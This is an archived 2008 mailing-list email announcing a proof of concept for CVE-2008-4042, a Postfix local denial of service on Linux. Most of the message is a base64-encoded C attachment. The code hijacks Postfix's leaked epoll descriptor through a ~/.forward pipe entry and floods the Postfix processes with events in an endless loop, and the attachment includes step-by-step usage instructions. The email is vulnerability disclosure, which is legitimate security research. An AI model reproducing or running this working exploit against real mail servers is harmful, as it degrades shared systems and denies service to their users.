Subject: [Suspected Spam][CVE-2008-4042] Postfix Linux-only local denial of service - PoC
From: Albert =?ISO-8859-1?Q?Sellar=E8s?= <whats@wekk.net.>
To: [email protected]
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-wIlX0+ZRGqD7KOkDUfmq"
Date: Tue, 16 Sep 2008 22:20:15 +0200
Message-Id: <1221596415.6261.21.camel@x61s.>
Mime-Version: 1.0
X-Mailer: Evolution 2.12.3
X-Brightmail-Tracker: AAAABQvUb28L1G9xC9SSpQvUbDwL1Gh8
X-Virus-Scanned: antivirus-gw at tyumen.ru
--=-wIlX0+ZRGqD7KOkDUfmq
Content-Type: multipart/mixed; boundary="=-ZnRUX0PM/byROkEqVMKT"
--=-ZnRUX0PM/byROkEqVMKT
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable
Hello,
I have released this PoC for the Linux-only local denial of service
caused by the leak of epoll file descriptors.
This Proof of concept creates a pipe and adds it in postfix's epoll file
descriptor.
When the pipe is added, an endless loop will launch lots of events to
the local and master postfix processes.=20
This PoC will slowdown the system a lot.
You can find all the needed files at
http://www.wekk.net/research/CVE-2008-4042/ and
http://www.wekk.net/research/CVE-2008-3889/ and attached with this
email.
Feel free to write me for feedback, corrections, etc.
--=20
Albert Sellar=C3=A8s GPG id: 0x13053FFE
http://www.wekk.net[email protected]=20
Linux User: 324456 Catalunya =20
--=-ZnRUX0PM/byROkEqVMKT
Content-Disposition: attachment; filename=CVE-2008-4042-exploit.c
Content-Type: text/x-csrc; name=CVE-2008-4042-exploit.c; charset=UTF-8
Content-Transfer-Encoding: base64
LyoNCiAqIGh0dHA6Ly93d3cud2Vray5uZXQvcmVzZWFyY2gvQ1ZFLTIwMDgtNDA0Mi9DVkUtMjAw
OC00MDQyLWV4cGxvaXQuYw0KICogaHR0cDovL3d3dy53ZWtrLm5ldC9yZXNlYXJjaC9DVkUtMjAw
OC0zODg5L0NWRS0yMDA4LTM4ODktZXhwbG9pdC5jDQogKg0KICogRXhwbG9pdCBmb3IgUG9zdGZp
eCAyLjQgYmVmb3JlIDIuNC45LCAyLjUgYmVmb3JlIDIuNS41LCBhbmQgMi42IA0KICogYmVmb3Jl
IDIuNi0yMDA4MDkwMiwgd2hlbiB1c2VkIHdpdGggdGhlIExpbnV4IDIuNiBrZXJuZWwuDQogKg0K
ICogQ1ZFLTIwMDgtMzg4OSAmIENWRS0yMDA4LTQwNDINCiAqDQogKiBieSBBbGJlcnQgU2VsbGFy
w6hzIDx3aGF0c1thdF13ZWtrW2RvdF1uZXQ+IC0gaHR0cDovL3d3dy53ZWtrLm5ldA0KICogYW5k
IE1hcmMgTW9yYXRhIEZpdMOpIDxtYXJjLm1vcmF0YS5maXRlW2F0XWdtYWlsW2RvdF1jb20+IA0K
ICogMjAwOC0wOS0xNg0KICoNCiAqIFRoaXMgUHJvb2Ygb2YgY29uY2VwdCBjcmVhdGVzIGEgcGlw
ZSwgYW5kIGFkZHMgaXQgaW4gdGhlIHBvc3RmaXgncyBlcG9sbCANCiAqIGZpbGUgZGVzY3JpcHRv
ci4NCiAqIFdoZW4gdGhlIHBpcGUgaXMgYWRkZWQsIGEgZW5kbGVzcyBsb29wIHdpbGwgbGF1bmNo
IGxvdHMgb2YgZXZlbnRzIHRvIHRoZSANCiAqIGxvY2FsIGFuZCBtYXN0ZXIgcG9zdGZpeCBwcm9j
ZXNzZXMuIA0KICogVGhpcyB3aWxsIHNsb3dkb3duIGRlIHN5c3RlbSBhIGxvdC4NCiAqDQogKiBB
biBleGFtcGxlIG9mIHVzZToNCiAqIDEtIFB1dCB0aGUgY29udGVudCAifCB+L0NWRS0yMDA4LTM4
ODktZXhwbG9pdCA+PiAvdG1wL3Bvc3RmaXgubG9nICYiICh3aXRoIA0KICogdGhlIGRvdWJsZSBx
dW90ZXMpIA0KICogaW4gdGhlIGZpbGUgfi8uZm9yd2FyZA0KICoNCiAqIDItIFB1dCB0aGUgQ1ZF
LTIwMDgtNDA0Mi1leHBsb2l0IGluIHlvdXIgaG9tZQ0KICogZ2NjIENWRS0yMDA4LTM4ODktZXhw
bG9pdC5jIC1vIENWRS0yMDA4LTM4ODktZXhwbG9pdA0KICoNCiAqIDMtIFNlbmQgYW5kIGVtYWls
IHRvIHRoZSB1c2VyDQogKg0KICogWW91IGNhbiBzZWUgdGhlIG91dHB1dCBhdCAvdG1wL3Bvc3Rm
aXgubG9nDQogKi8NCg0KDQojaW5jbHVkZSA8c3lzL2Vwb2xsLmg+DQojaW5jbHVkZSA8c3RkaW8u
aD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCiNpbmNsdWRlIDxzdHJpbmcuaD4NCiNpbmNsdWRlIDxz
dGRpby5oPg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zdGF0Lmg+DQoj
aW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8ZGlyZW50Lmg+DQojaW5jbHVkZSA8ZXJybm8u
aD4NCg0KI2RlZmluZSBGRE9QRU4gMjAwDQoNCg0Kdm9pZCBhZGRfZmQoaW50IGZkZSwgaW50IGZk
KSB7DQoJcHJpbnRmKCJbKl0gQWRkaW5nIGZkICVkIHRvIGV2ZW50cG9sbCAlZFxuIiwgZmQsIGZk
ZSk7DQoJc3RhdGljIHN0cnVjdCBlcG9sbF9ldmVudCBldjsNCglldi5ldmVudHMgPSBFUE9MTElO
fEVQT0xMT1VUfEVQT0xMUFJJfEVQT0xMRVJSfEVQT0xMSFVQfEVQT0xMRVQ7DQoJZXJybm8gPTA7
DQoJLy8gSWYgdGhpcyBpcyBhIHNvY2tldCBmZCwgdGhlIGxvYWQgaXMgaGlnaA0KCWV2LmRhdGEu
dTMyID0gNjsNCglldi5kYXRhLnU2NCA9IDY7DQoNCglpZiAoZXBvbGxfY3RsKGZkZSwgRVBPTExf
Q1RMX0FERCwgZmQsICZldikgPT0gMCkgew0KCQlwcmludGYoIiA9PiBGZCAlZCBhZGRlZCFcbiIs
IGZkKTsNCgl9IGVsc2Ugew0KCQlwcmludGYoIiA9PiBFcnJvciAoJWQpIGFkZGluZyBmZCAlZFxu
IiwgZXJybm8sIGZkKTsNCgl9DQp9DQoNCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10p
IHsNCg0KCWludCBmZHNbMl07DQoJY2hhciBkaXJbMzJdLCBjOw0KCWludCBpLCBmb3VuZCA9IDA7
DQoNCglwaXBlKGZkcyk7DQoJc3ByaW50ZihkaXIsICIvcHJvYy8lZC9mZCIsIGdldHBpZCgpKTsN
CglwcmludGYoIlsqXSBPcGVuaW5nIGRpcmVjdG9yeSAlc1xuIiwgZGlyKTsNCglESVIgKmZkX2Rp
ciA9IG9wZW5kaXIoZGlyKTsNCglzdHJ1Y3QgZGlyZW50ICpkZSA9IHJlYWRkaXIoZmRfZGlyKTsN
Cg0KCS8vIFdlIGFyZSBsb29raW5nIGZvciB0aGUgZXZlbnRwb2xsIGZpbGUgZGVzY3JpcHRvcg0K
CXdoaWxlIChkZSAhPSBOVUxMKSB7DQoJCWNoYXIgbGlua19kWzI1Nl07DQoJCWNoYXIgbGlua19m
WzI1Nl07DQoJCW1lbXNldChsaW5rX2QsIDAsIDI1Nik7DQoJCXNwcmludGYobGlua19mLCAiJXMv
JXMiLCBkaXIsIGRlLT5kX25hbWUpOw0KCQlyZWFkbGluayhsaW5rX2YsIGxpbmtfZCwgMjU2KTsN
CgkJaWYgKCBzdHJzdHIobGlua19kLCAiZXZlbnRwb2xsIikgKSB7DQoJCQlmb3VuZCA9IDE7DQoJ
CQlwcmludGYoIiA9PiAlcyBwb2ludHMgdG8gJXNcbiIsIGRlLT5kX25hbWUsIGxpbmtfZCk7DQoJ
CQlhZGRfZmQoYXRvaShkZS0+ZF9uYW1lKSwgZmRzWzBdKTsNCgkJCS8vIFdlIGNhbiB0ZXN0IHdp
dGggbW9yZSB0aGFuIG9uZSB0cmlnZ2VyZWQgZXZlbnQgYXQgb25jZQ0KCQkJZm9yIChpID0gMDsg
aTxGRE9QRU47IGkrKykNCgkJCQlhZGRfZmQoYXRvaShkZS0+ZF9uYW1lKSxkdXAoZmRzWzBdKSk7
DQoJCX0NCgkJZGUgPSByZWFkZGlyKGZkX2Rpcik7DQoJfQ0KCWNsb3NlZGlyKGZkX2Rpcik7DQoJ
DQoJaWYgKGZvdW5kID09IDApIHsNCgkJcHJpbnRmKCJbIV0gQXJlIHlvdSBzdXJlIHRoYXQgeW91
ciBwb3N0Zml4IGlzIHZ1bG5lcmFibGU/XG4iKTsNCgkJcHJpbnRmKCJbIV0gQXJlIHlvdSBsYXVu
Y2hpbmcgbWUgdGhyb3cgYSAuZm9yd2FyZCBmaWxlP1xuIik7DQoJCWV4aXQoMCk7DQoJfQ0KCQ0K
CXByaW50ZigiWypdIFN0YXJ0aW5nIHRvIGZsb29kIHRoZSBzeXN0ZW0hXG4iKTsNCglmZmx1c2go
c3Rkb3V0KTsNCgljbG9zZSgwKTsNCgljbG9zZSgxKTsNCgljbG9zZSgyKTsNCg0KCS8vIFRoaXMg
dHJpZ2dlcnMgdGhlIGV2ZW50cw0KCXdoaWxlICgxKSB7DQoJCXdyaXRlKGZkc1sxXSwgIkEiLDEp
Ow0KCQlyZWFkKGZkc1swXSwmYywgMSk7DQoJfQ0KDQoJcmV0dXJuIDA7DQp9DQo=
--=-ZnRUX0PM/byROkEqVMKT--
--=-wIlX0+ZRGqD7KOkDUfmq
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: =?ISO-8859-1?Q?Aix=F2?= =?ISO-8859-1?Q?_=E9s?= una part
d'un missatge, signada digitalment
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.9 (GNU/Linux)
iEYEABECAAYFAkjQFP8ACgkQK3eYPRMFP/4sUwCglO1ePf6SC6w9YYdhCr9rCrJK
Q1wAoNYy9W7aQnUsngr5IetlN+otR7th
=wlm2
-----END PGP SIGNATURE-----
--=-wIlX0+ZRGqD7KOkDUfmq--